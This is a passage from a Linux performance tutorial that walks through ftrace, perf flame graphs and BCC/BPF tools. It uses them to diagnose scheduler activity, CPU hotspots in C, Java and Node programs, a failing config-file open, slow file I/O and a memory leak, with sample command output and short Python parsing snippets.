print fmt: "prev_comm=%s prev_pid=%d prev_prio=%d prev_state=%s%s ==> next_comm=%s next_pid=%d next_prio=%d", REC->prev_comm, REC->prev_pid, REC->prev_prio, REC->prev_state & (2048-1) ? __print_flags(REC->prev_state & (2048-1), "|", { 1, "S"} , { 2, "D" }, { 4, "T" }, { 8, "t" }, { 16, "Z" }, { 32, "X" }, { 64, "x" }, { 128, "K" }, { 256, "W" }, { 512, "P" }, { 1024, "N" }) : "R", REC->prev_state & 2048 ? "+" : "", REC->next_comm, REC->next_pid, REC->next_prio
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > events/sched/sched_switch/enable
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 703/703 #P:1
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
bash-817 [000] d... 371.932169: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=R ==> next_comm=kworker/u128:3 next_pid=80 next_prio=120
kworker/u128:3-80 [000] d... 371.932187: sched_switch: prev_comm=kworker/u128:3 prev_pid=80 prev_prio=120 prev_state=S ==> next_comm=sshd next_pid=790 next_prio=120
sshd-790 [000] d... 371.932226: sched_switch: prev_comm=sshd prev_pid=790 prev_prio=120 prev_state=S ==> next_comm=bash next_pid=817 next_prio=120
bash-817 [000] d... 371.932236: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.935521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.935525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.939514: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.939517: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.943513: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.943516: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.947521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.947525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.951522: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.951527: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.955518: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.955522: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.959515: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.959518: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.963516: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
echo 0 > events/sched/sched_switch/enable
</code></pre></div></div>
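<p>Each record in the trace follows the print fmt shown above, so the trace file is easy to post-process. A small Python sketch that pulls the prev/next task out of one line (the regex is illustrative and would need refinement for comm names containing spaces, such as "rs:main Q:Reg"):</p>

```python
import re

SWITCH_RE = re.compile(
    r"sched_switch: prev_comm=(?P<prev_comm>\S+) prev_pid=(?P<prev_pid>\d+) "
    r".*?==> next_comm=(?P<next_comm>\S+) next_pid=(?P<next_pid>\d+)")

def parse_switch(line):
    """Return (prev_comm, prev_pid, next_comm, next_pid), or None if the
    line is not a sched_switch record."""
    m = SWITCH_RE.search(line)
    if not m:
        return None
    return (m.group("prev_comm"), int(m.group("prev_pid")),
            m.group("next_comm"), int(m.group("next_pid")))

line = ("bash-817 [000] d... 371.932169: sched_switch: prev_comm=bash "
        "prev_pid=817 prev_prio=120 prev_state=R ==> next_comm=kworker/u128:3 "
        "next_pid=80 next_prio=120")
parsed = parse_switch(line)
```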
<h3>Enable the function tracer</h3>
<p>Trace function calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
qemu-ga-449 [000] .... 591.951939: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.951965: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952138: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952222: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952247: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957259: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957331: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957356: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957516: vfs_write <-SyS_write
rs:main Q:Reg-425 [000] .... 591.957797: vfs_write <-SyS_write
</code></pre></div></div>
<p>View the detailed call path:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function_graph > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_graph_function
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
0) sshd-902 => rs:main-425
------------------------------------------
0) | vfs_write() {
0) | rw_verify_area() {
0) | security_file_permission() {
0) | apparmor_file_permission() {
0) | common_file_perm() {
0) 0.137 us | aa_file_perm();
0) 0.959 us | }
0) 1.468 us | }
0) 2.035 us | }
0) 2.605 us | }
</code></pre></div></div>
<p>Limit the graph depth:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 2 > max_graph_depth
</code></pre></div></div>
<p>Turn it off:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # echo nop > current_tracer
# echo > set_graph_function
</code></pre></div></div>
<h2 id="2">2. CPU Sampling with perf and Flame Graphs</h2>
<h3>A native program</h3>
<p>Compile the program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -fopenmp primes.c -o primes
root@ubuntu1604:~/linux-tracing-workshop# export OMP_NUM_THREADS=16
root@ubuntu1604:~/linux-tracing-workshop# perf record -g -F 997 -- ./primes
</code></pre></div></div>
<p>-g captures stacks, and -F sets the sampling frequency; perf.data is written to the current directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# perf report --stdio
# To display the perf.data header info, please use --header/--header-only options.
#
#
# Total Lost Samples: 0
#
# Samples: 7K of event 'cpu-clock'
# Event count (approx.): 7265797196
#
# Children Self Command Shared Object Symbol
# ........ ........ ....... ................. ...............................
#
99.99% 0.00% primes primes [.] main._omp_fn.0
|
---main._omp_fn.0
|
|--99.97%-- is_prime
| |
| |--85.01%-- is_divisible
| | |
| | |--0.08%-- retint_user
| | | prepare_exit_to_usermode
| | | exit_to_usermode_loop
</code></pre></div></div>
<p>We can see that is_divisible takes most of the time; perf annotate gives a closer look:</p>
<p><code>root@ubuntu1604:~/linux-tracing-workshop# perf annotate</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> is_divisible /root/linux-tracing-workshop/primes
│
│ int is_divisible(int n, int d)
│ {
0.02 │ push %rbp
│ mov %rsp,%rbp
5.98 │ mov %edi,-0x4(%rbp)
│ mov %esi,-0x8(%rbp)
│ return n % d == 0;
│ mov -0x4(%rbp),%eax
3.51 │ cltd
2.75 │ idivl -0x8(%rbp)
71.34 │ mov %edx,%eax
│ test %eax,%eax
5.51 │ sete %al
5.82 │ movzbl %al,%eax
│ }
5.07 │ pop %rbp
│ ← retq
</code></pre></div></div>
<p>Generate and view the flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # perf script > primes.stacks
# FlameGraph/stackcollapse-perf.pl primes.stacks > primes.collapsed
# FlameGraph/flamegraph.pl primes.collapsed > primes.svg
</code></pre></div></div>
<p>The flame graph confirms that is_divisible is indeed where the time goes.</p>
<p><img src="/assets/img/tracing1/2.png" alt="" /></p>
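<p>The stackcollapse-perf.pl step folds each sampled stack into one semicolon-joined line with a sample count, which flamegraph.pl then renders. The folding itself is tiny; a Python equivalent of the idea (not a drop-in replacement for the Perl script, which also parses perf script output):</p>

```python
from collections import Counter

def collapse(stacks):
    """stacks: list of call stacks, each ordered from outermost frame to leaf.
    Return a Counter mapping 'a;b;c' folded stacks to sample counts."""
    return Counter(";".join(stack) for stack in stacks)

folded = collapse([
    ["main._omp_fn.0", "is_prime", "is_divisible"],
    ["main._omp_fn.0", "is_prime", "is_divisible"],
    ["main._omp_fn.0", "is_prime"],
])
```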
<h3>A Java program</h3>
<p>Download and build <a href="https://github.com/jvm-profiling-tools/perf-map-agent.git">perf_map_agent</a>.</p>
<p>Start the sample application, but don't press Enter yet:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# java -XX:+PreserveFramePointer -XX:-Inline slowy/App
Press ENTER to start.
</code></pre></div></div>
<p>In another terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# jps
20274 App
20285 Jps
root@ubuntu1604:~/perf-map-agent/bin# ./perf-java-report-stack 20274
</code></pre></div></div>
<p>Now press Enter in the first terminal; the second terminal shows the data, and again it is isDivisible that takes the time:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Samples: 1K of event 'cpu-clock', Event count (approx.): 11969696850
Children Self Command Shared Object Symbol
+ 100.00% 0.00% java perf-20274.map [.] call_stub
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982d987b
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fb52e
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fde5f
+ 100.00% 0.00% java libjli.so [.] 0xffff801f96337552
+ 100.00% 0.00% java libjli.so [.] 0xffff801f9633b3dd
+ 100.00% 0.00% java libpthread-2.23.so [.] start_thread
+ 89.79% 10.63% java perf-20274.map [.] Lslowy/App;::isPrime
+ 89.20% 89.03% java perf-20274.map [.] Lslowy/App;::isDivisible
+ 72.07% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 17.13% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 10.80% 0.08% java perf-20274.map [.] Interpreter
+ 0.08% 0.00% java libjvm.so [.] 0xffff801f97f82ab0
+ 0.08% 0.00% java [kernel.kallsyms] [k] schedule
</code></pre></div></div>
<p>Generate the flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# cd /tmp/
root@ubuntu1604:/tmp# ls
hsperfdata_root java.svg perf-18877.data.old perf-20210.data perf-20210.map perf-20274.data perf-20274.map perf.data perf-vdso.so-4k55kH perf-vdso.so-HGHJGC
root@ubuntu1604:/tmp# mv perf-20274.data perf.data
root@ubuntu1604:/tmp# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl --colors=java > java.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing1/2.1.png" alt="" /></p>
<h3>A Node program</h3>
<p>Node must be started with --perf_basic_prof. Enter the nodey directory and start run.sh:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ./run.sh perf
</code></pre></div></div>
<p>Start perf in another terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf record -F 97 -p $(pgrep -n node) -g
</code></pre></div></div>
<p>Drive some load from the first terminal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ab -c 10 -n 100 -m POST 'http://localhost:3000/users/auth?username=foo&password=wrong'
</code></pre></div></div>
<p>After stopping perf, inspect the data:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf report -i perf.data
</code></pre></div></div>
<p>And of course we can also generate a flame graph:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu1604:~/perf-map-agent/bin# perf script -i perf.data | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > node.svg
</code></pre></div></div>
<h2 id="3"> 3. Using BPF Tools: Broken File Opens </h2>
<p>This lab uses BCC tools to troubleshoot an error during program startup.</p>
<p>First, compile the buggy program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -O0 server.c -o server
</code></pre></div></div>
<p>Run server. Although it reports a successful start, it never finishes initializing and appears stuck; top shows that it is still consuming a fair amount of CPU.
Check server's user-mode and kernel-mode CPU utilization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# pidstat -u -p $(pidof server) 1
Linux 4.4.0-21-generic (ubuntu1604) 12/04/2017 _x86_64_ (1 CPU)
12:46:39 PM UID PID %usr %system %guest %CPU CPU Command
12:46:40 PM 0 29947 1.15 11.49 0.00 12.64 0 server
12:46:41 PM 0 29947 1.18 11.76 0.00 12.94 0 server
12:46:42 PM 0 29947 5.62 6.74 0.00 12.36 0 server
12:46:43 PM 0 29947 2.30 10.34 0.00 12.64 0 server
12:46:44 PM 0 29947 1.11 11.11 0.00 12.22 0 server
12:46:45 PM 0 29947 2.27 9.09 0.00 11.36 0 server
12:46:46 PM 0 29947 3.53 10.59 0.00 14.12 0 server
12:46:47 PM 0 29947 1.16 11.63 0.00 12.79 0 server
</code></pre></div></div>
<p>server spends most of its time in kernel mode. syscount shows that it issues the nanosleep and open syscalls very frequently.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/bin# ./syscount -cp $(pidof server)
Tracing PID 29947... Ctrl-C to end.
^CSYSCALL COUNT
nanosleep 202027
open 202054
root@ubuntu1604:~/perf-tools/bin#
</code></pre></div></div>
<p>opensnoop shows the open() requests the process issues:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# opensnoop -p $(pidof server) -d 0.01
Tracing open()s issued by PID 910 for 0.01 seconds (buffered)...
COMM PID FD FILE
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
</code></pre></div></div>
<p>The root cause is now fairly clear: server keeps trying to open /etc/tracing-server-example.conf, but the file does not exist, so initialization never succeeds.</p>
<p>We can also use argdist to inspect function or syscall arguments. For example, looking at nanosleep's argument, most values fall in the 512-1023 bucket; server sleeps for 1000 ns at a time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -H 'p::SyS_nanosleep(struct timespec *time):u64:time->tv_nsec'
[14:09:10]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15864 |****************************************|
[14:09:11]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15890 |****************************************|
[14:09:12]
</code></pre></div></div>
<p>Similarly, we inspect open's argument and return value:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'p:c:open(char *filename):char*:filename'
[14:13:04]
p:c:open(char *filename):char*:filename
COUNT EVENT
14626 filename = /etc/tracing-server-example.conf
[14:13:05]
p:c:open(char *filename):char*:filename
COUNT EVENT
14606 filename = /etc/tracing-server-example.conf
[14:13:06]
p:c:open(char *filename):char*:filename
COUNT EVENT
14482 filename = /etc/tracing-server-example.conf
[14:13:07]
p:c:open(char *filename):char*:filename
COUNT EVENT
14400 filename = /etc/tracing-server-example.conf
^Croot@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'r:c:open():int:$retval'
[14:13:28]
r:c:open():int:$retval
COUNT EVENT
14451 $retval = -1
[14:13:29]
r:c:open():int:$retval
COUNT EVENT
14441 $retval = -1
^Croot@ubuntu1604:~/bcc/tools#
</code></pre></div></div>
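<p>Putting the pieces together, server's init loop is presumably something like the sketch below: try to open the config, fail with ENOENT, sleep about 1000 ns, and retry. This is a reconstruction for illustration, not the actual server.c (which retries forever; the sketch bounds the attempts so it terminates):</p>

```python
import os
import time

def try_init(path, attempts=5, sleep_ns=1000):
    """Retry opening the config file, sleeping between attempts.
    Return the fd on success, or -1 after exhausting the retries."""
    for _ in range(attempts):
        try:
            return os.open(path, os.O_RDONLY)
        except FileNotFoundError:
            # open() returned -1 with ENOENT; back off briefly and retry
            time.sleep(sleep_ns / 1e9)
    return -1

# A path that does not exist, standing in for the missing conf file.
result = try_init("/nonexistent/tracing-server-example.conf")
```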
<h2 id="4"> 4. Using BPF Tools: Slow File I/O </h2>
<p>This lab tracks down cases of high I/O latency.</p>
<p>First compile and run the lab program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -O0 -pthread logger.c -o logger
root@ubuntu1604:~/linux-tracing-workshop# ./logger
</code></pre></div></div>
<p>Suppose you have been told that logger occasionally exhibits high latency (which is why you were asked to look into it :)). The first suspicion is that slow I/O operations cause the latency. Check with biolatency:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biolatency 1
Tracing block device I/O... Hit Ctrl-C to end.
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 24 |********* |
1024 -> 2047 : 98 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 26 |********** |
1024 -> 2047 : 102 |****************************************|
2048 -> 4095 : 1 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 4 |* |
^C
usecs : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 20 |******** |
1024 -> 2047 : 93 |****************************************|
2048 -> 4095 : 8 |*** |
4096 -> 8191 : 1 | |
8192 -> 16383 : 5 |** |
root@ubuntu1604:/usr/share/bcc/tools#
</code></pre></div></div>
<p>Most I/O operations complete quickly, but a few take much longer. Running biosnoop shows that some of logger's I/O requests are noticeably larger:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./biosnoop
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3230184 4096 1.49
0.001188000 jbd2/vda1-8 173 vda W 1611120 8192 1.15
0.002201000 jbd2/vda1-8 173 vda W 1611136 4096 0.90
0.023616000 logger 2120 vda W 3230192 4096 1.22
0.024938000 jbd2/vda1-8 173 vda W 1611144 8192 1.29
0.026173000 jbd2/vda1-8 173 vda W 1611160 4096 1.13
0.047631000 logger 2120 vda W 3230192 4096 1.23
0.048968000 jbd2/vda1-8 173 vda W 1611168 8192 1.30
0.050024000 jbd2/vda1-8 173 vda W 1611184 4096 0.95
0.071440000 logger 2120 vda W 3230192 4096 1.20
0.072585000 jbd2/vda1-8 173 vda W 1611192 8192 1.11
0.073800000 jbd2/vda1-8 173 vda W 1611208 4096 1.09
0.090548000 logger 2121 vda W 3217408 1048576 9.84
0.091801000 jbd2/vda1-8 173 vda W 1611216 8192 1.16
0.093033000 jbd2/vda1-8 173 vda W 1611232 4096 1.13
</code></pre></div></div>
<p>Filtering on the logger process alone shows that it occasionally issues very slow I/O operations:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ^Croot@ubuntu1604:/usr/share/bcc/tools# ./biosnoop -p $(pidof logger)
TIME(s) COMM PID DISK T SECTOR BYTES LAT(ms)
0.000000000 logger 2120 vda W 3235144 4096 1.15
0.001174000 jbd2/vda1-8 173 vda W 1609744 8192 1.10
0.002295000 jbd2/vda1-8 173 vda W 1609760 4096 1.01
0.023569000 logger 2120 vda W 3235144 4096 1.06
0.024656000 jbd2/vda1-8 173 vda W 1609768 8192 1.05
0.025822000 jbd2/vda1-8 173 vda W 1609784 4096 1.07
0.037940000 logger 2121 vda W 3217408 1048576 9.31
0.039198000 jbd2/vda1-8 173 vda W 1609792 8192 1.16
0.040218000 jbd2/vda1-8 173 vda W 1609808 4096 0.92
</code></pre></div></div>
<p>With fileslower the cause of logger's latency spikes becomes clear: an occasional 1 MB write to flush.data, far larger than the usual 1024-byte writes to log.data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./fileslower.py 1
Tracing sync read/writes slower than 1 ms
TIME(s) COMM TID D BYTES LAT(ms) FILENAME
0.027 logger 1182 W 1024 3.79 log.data
0.055 logger 1182 W 1024 8.35 log.data
0.079 logger 1182 W 1024 3.62 log.data
0.103 logger 1182 W 1024 3.81 log.data
0.126 logger 1182 W 1024 3.71 log.data
0.150 logger 1182 W 1024 3.67 log.data
0.174 logger 1182 W 1024 3.68 log.data
0.198 logger 1182 W 1024 3.97 log.data
0.219 logger 1183 W 1048576 13.95 flush.data
0.222 logger 1182 W 1024 3.78 log.data
0.245 logger 1182 W 1024 3.54 log.data
0.269 logger 1182 W 1024 3.55 log.data
0.293 logger 1182 W 1024 3.76 log.data
0.317 logger 1182 W 1024 3.89 log.data
0.341 logger 1182 W 1024 3.85 log.data
0.364 logger 1182 W 1024 3.49 log.data
0.389 logger 1182 W 1024 4.96 log.data
0.413 logger 1182 W 1024 3.90 log.data
0.431 logger 1183 W 1048576 12.00 flush.data
</code></pre></div></div>
<h2 id="5"> 5. Using BPF Tools: Chasing a Memory Leak</h2>
<p>In this exercise we use the BPF tool memleak to track down a memory leak in a program.</p>
<p>Compile and run the program, feed it input to count, and watch in htop as wordcount's memory usage keeps growing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> g++ -fno-omit-frame-pointer -std=c++11 -g wordcount.cc -o wordcount
</code></pre></div></div>
<p>Use memleak to check whether memory is leaking:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools/old# ./memleak -p $(pidof wordcount)
</code></pre></div></div>
<p>By default, memleak prints every 5 seconds the allocations that have not yet been freed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[18:15:21] Top 10 stacks with outstanding allocations:
[18:15:36] Top 10 stacks with outstanding allocations:
34 bytes in 2 allocations from stack
[unknown]
35 bytes in 2 allocations from stack
[unknown]
[unknown]
64 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<input_reader, std::allocator<input_reader>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<input_reader, std::allocator<input_reader>>(std::_Sp_make_shared_tag, input_reader*, std::allocator<input_reader> const&)+0x59
std::__shared_ptr<input_reader, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x3c
std::shared_ptr<input_reader>::shared_ptr<std::allocator<input_reader>>(std::_Sp_make_shared_tag, std::allocator<input_reader> const&)+0x28
std::shared_ptr<input_reader> std::allocate_shared<input_reader, std::allocator<input_reader>>(std::allocator<input_reader> const&)+0x37
std::shared_ptr<input_reader> std::make_shared<input_reader>()+0x3b
main+0x3b
__libc_start_main+0xf0
128 bytes in 2 allocations from stack
std::allocator_traits<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&, unsigned long)+0x28
std::__allocated_ptr<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > > std::__allocate_guarded<std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> > >(std::allocator<std::_Sp_counted_ptr_inplace<word_counter, std::allocator<word_counter>, (__gnu_cxx::_Lock_policy)2> >&)+0x21
std::__shared_count<(__gnu_cxx::_Lock_policy)2>::__shared_count<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, word_counter*, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x5f
std::__shared_ptr<word_counter, (__gnu_cxx::_Lock_policy)2>::__shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x50
std::shared_ptr<word_counter>::shared_ptr<std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::_Sp_make_shared_tag, std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x3c
std::shared_ptr<word_counter> std::allocate_shared<word_counter, std::allocator<word_counter>, std::shared_ptr<input_reader>&>(std::allocator<word_counter> const&, std::shared_ptr<input_reader>&)+0x4b
_ZSt11make_sharedI12word_counterIRSt10shared_ptrI12input_readerEEES1_IT_EDpOT0_+0x51
main+0x4e
__libc_start_main+0xf0
1767 bytes in 97 allocations from stack
???
4194304 bytes in 1 allocations from stack
std::allocator_traits<std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::allocate(std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >&, unsigned long)+0x28
std::_Vector_base<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >::_M_allocate(unsigned long)+0x2a
